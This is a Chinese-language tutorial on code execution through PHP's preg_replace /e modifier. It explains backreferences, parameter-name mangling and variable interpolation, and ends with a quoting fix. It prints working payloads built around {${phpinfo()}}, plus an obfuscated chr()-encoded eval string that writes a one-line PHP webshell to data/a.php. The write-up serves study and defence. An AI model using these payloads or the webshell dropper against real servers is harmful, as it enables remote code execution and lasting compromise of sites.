PHP正则e模式代码执行

前言

本文将深入研究 preg_replace /e 模式下的代码执行问题，其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析，当中的坑非常多，相信看完本文，你一定会有所收获。下面是 七月火 和 l1nk3r 的分析结果。

案例

下面先看一个案例，思考如何利用此处的 preg_replace /e 模式，执行代码（可以先不看下文分析，自己思考出 payload 试试）。

这个案例实际上很简单，就是 preg_replace 使用了 /e 模式，导致可以代码执行，而且该函数的第一个和第三个参数都是我们可以控制的。我们都知道， preg_replace 函数在匹配到符号正则的字符串时，会将替换字符串（也就是上图 preg_replace 函数的第二个参数）当做代码来执行，然而这里的第二个参数却固定为 ‘strtolower(“\1”)’ 字符串，那这样要如何执行代码呢？

爬坑1

上面的命令执行，相当于 eval(‘strtolower(“\1”);’) 结果，当中的 \1 实际上就是 \1 ，而 \1 在正则表达式中有自己的含义。我们来看看 W3Cschool 中对其的描述：

反向引用

对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中，所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始，最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问，其中 n 为一个标识特定缓冲区的一位或两位十进制数。

所以这里的 \1 实际上指定的是第一个子匹配项，我们拿 ripstech 官方给的 payload 进行分析，方便大家理解。官方 payload 为： /?.*={${phpinfo()}} ，即 GET 方式传入的参数名为 /?.* ，值为 {${phpinfo()}} 。

1 2	原先的语句： preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value); 变成了语句： preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

爬坑2

上面的 preg_replace 语句如果直接写在程序里面，当然可以成功执行 phpinfo() ，然而我们的 .* 是通过 GET 方式传入，你会发现无法执行 phpinfo 函数，如下图：

我们 var_dump 一下 $_GET 数组，会发现我们传上去的 .* 变成了 _* ，如下图所示：

这是由于在PHP中，对于传入的非法的 $_GET 数组参数名，会将其转换成下划线，这就导致我们正则匹配失效。我们可以 fuzz 一下PHP会将哪些符号替换成下划线，发现有：（这是非法字符不为首字母的情况）

当非法字符为首字母时，只有点号会被替换成下划线：

所以我们要做的就是换一个正则表达式，让其匹配到 {${phpinfo()}} 即可执行 phpinfo 函数。这里我提供一个 payload ： \S*=${phpinfo()} 执行结果如下：

爬坑3

下面再说说我们为什么要匹配到 {${phpinfo()}} 或者 ${phpinfo()} ，才能执行 phpinfo 函数，这是一个小坑。这实际上是 PHP可变变量的原因。在PHP中双引号包裹的字符串中可以解析变量，而单引号则不行。 ${phpinfo()} 中的 phpinfo() 会被当做变量先执行，执行后，即变成 ${1} (phpinfo()成功执行返回true)。如果这个理解了，你就能明白下面这个问题：

var_dump(phpinfo()); // 结果：布尔 true
var_dump(strtolower(phpinfo()));// 结果：字符串 '1'
var_dump(preg_replace('/(.*)/ie','1','{${phpinfo()}}'));// 结果：字符串'11'

var_dump(preg_replace('/(.*)/ie','strtolower("\\1")','{${phpinfo()}}'));// 结果：空字符串''
var_dump(preg_replace('/(.*)/ie','strtolower("{${phpinfo()}}")','{${phpinfo()}}'));// 结果：空字符串''
这里的'strtolower("{${phpinfo()}}")'执行后相当于 strtolower("{${1}}") 又相当于 strtolower("{null}") 又相当于 '' 空字符串

要确保 replacement 构成一个合法的 PHP 代码字符串，否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误

preg_replace函数原型：

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特别说明： /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码（在适当的逆向引用替换完之后）。提示：要确保 replacement 构成一个合法的 PHP 代码字符串，否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。举例：

<?php
preg_replace ("/(</?)(w+)([^>]*>)/e",
"\1.strtoupper(\2).\3",
$html_body);
?>

这将使输入字符串中的所有 HTML 标记变成大写。

安全威胁分析：通常subject参数是由客户端产生的，客户端可能会构造恶意的代码，例如：

复制代码代码如下:

1
2
3

<?
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>

如果我们提交?h=phpinfo()，phpinfo()将会被执行（使用/e修饰符，preg_replace会将 replacement 参数当作 PHP 代码执行）。如果我们提交下面的代码会怎么样呢？ ?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97). chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60). chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91). chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59)) 密文对应的明文是：fputs(fopen(data/a.php,w),); 执行的结果是在/data/目录下生成一个一句话木马文件 a.php。

再来一个有难度的例子：

复制代码代码如下:

<?
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("\1")', $_GET["h"]);
?>

提交 ?h=[php]phpinfo()[/php]，phpinfo()会被执行吗？肯定不会。因为经过正则匹配后， replacement 参数变为’test(“phpinfo”)’，此时phpinfo仅是被当做一个字符串参数了。有没有办法让它执行呢？

当然有。在这里我们如果提交?h=[php]{${phpinfo()}}[/php]，phpinfo()就会被执行。为什么呢？在php中，双引号里面如果包含有变量，php解释器会将其替换为变量解释后的结果；单引号中的变量不会被处理。注意：双引号中的函数不会被执行和替换。

在这里我们需要通过{${}}构造出了一个特殊的变量，’test(“{${phpinfo()}}”)’，达到让函数被执行的效果（${phpinfo()}会被解释执行）。可以先做如下测试：

复制代码代码如下:

1	echo "{${phpinfo()}}";

phpinfo会被成功执行了。

如何防范这种漏洞呢？将’test(“\1”)’ 修改为”test(‘\1’)”，这样‘${phpinfo()}’就会被当做一个普通的字符串处理（单引号中的变量不会被处理）。